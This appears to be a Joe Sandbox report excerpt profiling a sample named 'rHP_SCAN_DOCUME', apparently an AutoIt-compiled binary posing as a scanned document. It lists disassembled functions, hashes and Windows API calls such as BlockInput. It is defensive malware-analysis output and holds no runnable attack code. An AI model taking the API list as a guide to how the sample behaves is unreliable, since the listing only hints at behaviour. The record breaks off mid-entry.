Opcode ID: cea1b9150f361c659902684389e7058cd1410a48798386b4049c0cef99ba48e3
Instruction ID: a642d05dabaa7eb16fe400253d06f9fa970551e5c75dc5a04351955ebeed5247
Opcode Fuzzy Hash: cea1b9150f361c659902684389e7058cd1410a48798386b4049c0cef99ba48e3
Instruction Fuzzy Hash: 8AB13B3161060D9FD715CF28C486B657FE0FF46368F298658E899CF2A2D335E9A1CB41

Function 0082B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0086851F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b212818d0b91b5ed7220222ddd69c2db6764735fc6f747ef757894932280415e
Instruction ID: 216920d801b8118a1d463272249d7e407a4e92af7020281f7621547972a460bb
Opcode Fuzzy Hash: b212818d0b91b5ed7220222ddd69c2db6764735fc6f747ef757894932280415e
Instruction Fuzzy Hash: CC125D71900229DBDB24DF58D880AEEB7F5FF48710F15819AE849EB355DB309E81CB94

Function 0088EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0088EABD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ce588ee29a22f8555bbf39b71dd1544767d069b9a1f00d930e07580c95f61921
Instruction ID: 4c512078564a12f03963e9a6c230394c3ca346c48f19accb7df23dd2d3d3de31
Opcode Fuzzy Hash: ce588ee29a22f8555bbf39b71dd1544767d069b9a1f00d930e07580c95f61921
Instruction Fuzzy Hash: F8E01A312002149FD710EF59D804E9AB7EDFFA8760F00841AFC49C7251DAB0E8818B91

Function 008309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008303EE), ref: 008309DA

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bc919a8e2cf1ceac08001761b7f7edd08c4a54187c05fa91ea0ebd217892c5ff
Instruction ID: 20df7bdd77c022cd690da5cce05f22b331c7ac8e80e7d5dd8941b7f5ca93258c
Opcode Fuzzy Hash: bc919a8e2cf1ceac08001761b7f7edd08c4a54187c05fa91ea0ebd217892c5ff
Instruction Fuzzy Hash:

Function 0083781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0083798B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 1b49fa875631ea889c9f200ae6ab626512ab636b6a6e1c4dc23dc3387ca48c4d
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 4D516AE160C749ABDB38552C845E7BE67C5FBD2304F180A39ED82D7682C619DE01D3DA

Function 00846DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e1d9d38be0a9137e8619b6063ed8a4132fdc80d7ecd34337e1c466149c9185
Instruction ID: fb81b05b4a5898cfc4bd33b73685602ab858eaa4dee5a6eccf17f0bd3b4e6417
Opcode Fuzzy Hash: f8e1d9d38be0a9137e8619b6063ed8a4132fdc80d7ecd34337e1c466149c9185
Instruction Fuzzy Hash: 6B320222D29F454DDB239635C822336A749FFB73C5F15D737E81AB5AA6EB29C4834100

Function 0082CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b262e182013ceb25a29c1af994b5f9018ca2059bb18a7ebe52985b5d463533fa
Instruction ID: e906d5ca14522cfc8a7d248986f17f46b357e028a35781b065360528bcd43354
Opcode Fuzzy Hash: b262e182013ceb25a29c1af994b5f9018ca2059bb18a7ebe52985b5d463533fa
Instruction Fuzzy Hash: 10323572A001698BCF28CF69D89467D7BA1FB45314F2A816BD8CACB391D734DE81DB41

Function 00817920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44281571b4bddd8fd21163ee677aab5c8cf25c58386d5de8eec0216fb62fb297
Instruction ID: 5a218a5b98cbf5a3f3e2b22221fd1c0603517c14f7f049625c065a6a9635e500
Opcode Fuzzy Hash: 44281571b4bddd8fd21163ee677aab5c8cf25c58386d5de8eec0216fb62fb297
Instruction Fuzzy Hash: 5222BFB0A04609DFDF14CF68D891AEEB7F9FF44314F204229E816E7291EB369994CB51

Function 008191C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 126a7779f868db355cb4a199ebf86462051868d56a91a4e3d075de0b64e920e3
Instruction ID: f2290b465aeb1debf81ef7d1a53a3e6021522a065d55491f560358989eb0f6d7
Opcode Fuzzy Hash: 126a7779f868db355cb4a199ebf86462051868d56a91a4e3d075de0b64e920e3
Instruction Fuzzy Hash: 9802D6B0E00119EBDB09DF68D981AAEB7B5FF44304F118169E856DB391EB31EE54CB81

Function 008319B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 5bd3cfd7bc3e020fdd26fb9e58f3014ff24f0365b232043a65fa3e5129125459
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 7D9153722090A34ADF69427A857C03DFFE1EAD2BB6B1A079DD4F2CA1C1FE1485649660

Function 00837A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf8993e98e8b2801585ff3f3187af8f14567d2554357156b8ec6b6aaecf81f46
Instruction ID: 4fbabdcf2a005b60049a13f9edfb7f1fe59e270673dbdfca2964a3941707b248
Opcode Fuzzy Hash: cf8993e98e8b2801585ff3f3187af8f14567d2554357156b8ec6b6aaecf81f46
Instruction Fuzzy Hash: B16179F1208719A6DE349A2C8CA5BBEA3A4FFC1764F140D1AF943DB281D651DE42C3D6

Function 00837CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9559d90bb9049eccd817f4316904b2ed2e513dd0ade78bf26166ee9bc437f90
Instruction ID: d3cf7b5636e3d43d6c2b852d1beb03d554085a51f0154096a168c26123895f35
Opcode Fuzzy Hash: f9559d90bb9049eccd817f4316904b2ed2e513dd0ade78bf26166ee9bc437f90
Instruction Fuzzy Hash: A6616AF160C709A6DE389A2C9895BBF2398FFC1B04F100959F943DB285EA52DD4287D6

Function 00831706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d51ebd215d6352ae5dd3ae154b35713014a6449aa6e73c61c95f9234e349808
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: BF8184326090A309DF6D423A857C03EFFE1FAD2BA1B1A07ADD4F2CA1C5EE148554D6A0

Function 00882046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8e22dd85afc12a18eb60b4e5f0048fc0c44146c458c4b43d3fbc42cbf757af
Instruction ID: a67522e40ed37fcac2a56266aa90503e2a321e6c27a394e4c52d64206fd4cf85
Opcode Fuzzy Hash: 2c8e22dd85afc12a18eb60b4e5f0048fc0c44146c458c4b43d3fbc42cbf757af
Instruction Fuzzy Hash: B021A8326206518BDB28CE79C85267A73E9F7A4310F15862EE4A7C77D0DE75A904CB80

Function 00892ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00892B30
DeleteObject.GDI32(00000000), ref: 00892B43
DestroyWindow.USER32 ref: 00892B52
GetDesktopWindow.USER32 ref: 00892B6D
GetWindowRect.USER32(00000000), ref: 00892B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00892CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00892CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892CF8
GetClientRect.USER32(00000000,?), ref: 00892D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00892D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892D80
GlobalLock.KERNEL32(00000000), ref: 00892D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892D98
GlobalUnlock.KERNEL32(00000000), ref: 00892DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892DA8
GlobalFree.KERNEL32(00000000), ref: 00892DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,008AFC38,00000000), ref: 00892DDB
GlobalFree.KERNEL32(00000000), ref: 00892DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00892E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00892E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00892E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089303F

Strings

static, xrefs: 00892D3A, 00892E91
, xrefs: 00892FC5
AutoIt v3, xrefs: 00892CF2
DISPLAY, xrefs: 00892EA2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: fb38228d3c29fa54fdc59c342f3c8957a2f56fe094ee84cab5c3e5862b1c95e9
Instruction ID: 97de340f9f6b83ed04b2b2090e0cfc9363d2345b27cc8e2e4d2abfcd90d07a1e
Opcode Fuzzy Hash: fb38228d3c29fa54fdc59c342f3c8957a2f56fe094ee84cab5c3e5862b1c95e9
Instruction Fuzzy Hash: 04025B71A00209AFDB14DF68CC89EAE7BB9FF49714F048158F915EB2A1DB74AD41CB60

Function 008A70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 008A712F
GetSysColorBrush.USER32(0000000F), ref: 008A7160
GetSysColor.USER32(0000000F), ref: 008A716C
SetBkColor.GDI32(?,000000FF), ref: 008A7186
SelectObject.GDI32(?,?), ref: 008A7195
InflateRect.USER32(?,000000FF,000000FF), ref: 008A71C0
GetSysColor.USER32(00000010), ref: 008A71C8
CreateSolidBrush.GDI32(00000000), ref: 008A71CF
FrameRect.USER32(?,?,00000000), ref: 008A71DE
DeleteObject.GDI32(00000000), ref: 008A71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 008A7230
FillRect.USER32(?,?,?), ref: 008A7262
GetWindowLongW.USER32(?,000000F0), ref: 008A7284

Part of subcall function 008A73E8: GetSysColor.USER32(00000012), ref: 008A7421
Part of subcall function 008A73E8: SetTextColor.GDI32(?,?), ref: 008A7425
Part of subcall function 008A73E8: GetSysColorBrush.USER32(0000000F), ref: 008A743B
Part of subcall function 008A73E8: GetSysColor.USER32(0000000F), ref: 008A7446
Part of subcall function 008A73E8: GetSysColor.USER32(00000011), ref: 008A7463
Part of subcall function 008A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008A7471
Part of subcall function 008A73E8: SelectObject.GDI32(?,00000000), ref: 008A7482
Part of subcall function 008A73E8: SetBkColor.GDI32(?,00000000), ref: 008A748B
Part of subcall function 008A73E8: SelectObject.GDI32(?,?), ref: 008A7498
Part of subcall function 008A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008A74B7
Part of subcall function 008A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008A74CE
Part of subcall function 008A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008A74DB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: c9aa2472fe2bba443331ba6676e2862ba4942fc6fab183babdcf08ab4e58cd44
Instruction ID: b3bb462dd0ce0a7ae6662ff588936cfd1ad9fdde6cffd59e1b205db197554190
Opcode Fuzzy Hash: c9aa2472fe2bba443331ba6676e2862ba4942fc6fab183babdcf08ab4e58cd44
Instruction Fuzzy Hash: E5A1B172508301AFEB009F64DC48E6B7BE9FF4A320F100A19FA62D65E1D771E944DB51

Function 00828D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00828E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00866AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00866AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00866F43

Part of subcall function 00828F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00828BE8,?,00000000,?,?,?,?,00828BBA,00000000,?), ref: 00828FC5

SendMessageW.USER32(?,00001053), ref: 00866F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00866F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00866FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00866FB7

Strings

0, xrefs: 00866DCF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 0dd8709217487b3a66ea32c62c09df53a7ab02f650b81c5a8a3a299a4e8895ff
Instruction ID: b70db125fb125cf0974ab0f53f6bc23a8959cc2a06a46a60c42d7903aff38419
Opcode Fuzzy Hash: 0dd8709217487b3a66ea32c62c09df53a7ab02f650b81c5a8a3a299a4e8895ff
Instruction Fuzzy Hash: 9112CD34201291DFDB25DF28D888BA9BBE1FB45310F564069F485CB662DB32ECA1CF91

Function 00892711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0089273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0089286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008928A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008928B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00892900
GetClientRect.USER32(00000000,?), ref: 0089290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00892955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00892964
GetStockObject.GDI32(00000011), ref: 00892974
SelectObject.GDI32(00000000,00000000), ref: 00892978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00892988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00892991
DeleteDC.GDI32(00000000), ref: 0089299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008929C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 008929DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00892A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00892A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00892A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00892A77
GetStockObject.GDI32(00000011), ref: 00892A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00892A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00892A97

Strings

msctls_progress32, xrefs: 00892A13
static, xrefs: 0089294F, 00892A71
AutoIt v3, xrefs: 008928F8
DISPLAY, xrefs: 0089295A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
